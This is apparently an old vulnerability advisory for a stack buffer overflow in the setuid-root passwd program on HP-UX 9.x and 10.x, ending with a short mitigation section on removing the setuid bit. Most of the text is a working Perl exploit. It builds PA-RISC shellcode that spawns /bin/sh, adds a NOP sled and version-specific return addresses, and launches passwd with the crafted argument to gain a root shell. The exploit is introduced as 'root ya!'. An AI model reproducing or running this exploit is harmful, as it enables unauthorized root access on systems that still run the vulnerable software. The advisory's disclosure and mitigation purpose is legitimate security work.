COMMAND
/bin/passwd
SYSTEMS AFFECTED
HP/UX 9.X, 10.X (10.20 too)
PROBLEM
Due to insufficient bounds checking on arguments which are
supplied by users, it is possible to overwrite the internal stack
space of the passwd program while it is executing. By supplying
a carefully designed argument to the passwd program, intruders
may be able to force passwd to execute arbitrary commands. As
passwd is setuid root, it may allow intruders to run arbitrary
commands with root privileges.
By default, a dynamically linked version of the passwd program is
found in /usr/bin under HP-UX 10.x. A statically linked version is
also available under HP-UX 10.x and is located in /sbin.
Thanks to that and following SOD's exploit, root ya!
#!/usr/contrib/bin/perl
sub h2cs {
local($stuff)=@_;
local($rv);
while($stuff !~ /^$/) {
$bob=$stuff;
$bob =~ s/^(..).*$/$1/;
$stuff =~ s/^..//;
#$rv.=chr(oct("0x${bob}"));
$rv.=sprintf("%c",oct("0x${bob}"));
}
return $rv;
}
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;
if ($rev eq "10") {
$offset=2102;
$prealign="AA"; # 2 byte pre
$postalign=""; # 0 byte post
$pcoq=&h2cs("7b03b463");
$pcoq=&h2cs("7b03b000");
} else {
$offset=2170; # 2170 works for 9.X...
$prealign=""; # zero byte pre
$postalign="PP"; # 2 byte post
$pcoq=&h2cs("7b033018");
}
$nop=&h2cs("08210280");
$code="";
$code.=&h2cs("34160506"); # LDI 643,r22
$code.=&h2cs("96d60534"); # SUBI 666,r22,r22
$code.=&h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=&h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=&h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=&h2cs("e83f1ffd"); # BL .+8,r1
$code.=&h2cs("08210280"); # NOP
$code.=&h2cs("34020102"); # LDI 129,rp
$code.=&h2cs("08410402"); # SUB r1,rp,rp
$code.=&h2cs("60400162"); # STB r0,177(rp)
$code.=&h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=&h2cs("0b390299"); # XOR arg1,arg1,arg1
$code.=&h2cs("0b180298"); # XOR arg2,arg2,arg2
$code.=&h2cs("341604be"); # LDI 607,r22
$code.=&h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=&h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=&h2cs("96d60534"); # SUB 666,r22,r22
$code.=&h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff
$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/bin/passwd","$of");
SOLUTION
1 Install passwd wrapper
2 Remove setuid and non-root execute permissions on /sbin/passwd
# ls -l /sbin/passwd
-r-sr-xr-x 1 root bin 487424 Jun 10 17:00 /sbin/passwd
# chmod 500 /sbin/passwd
# ls -l /sbin/passwd
-r-x------ 1 root bin 487424 Jun 10 17:00 /sbin/passwd
Note this will remove the ability for non-root users to execute
/sbin/passwd.
After 08. January patch for 9.x will be available, while for 10.x
patch will be available before this term.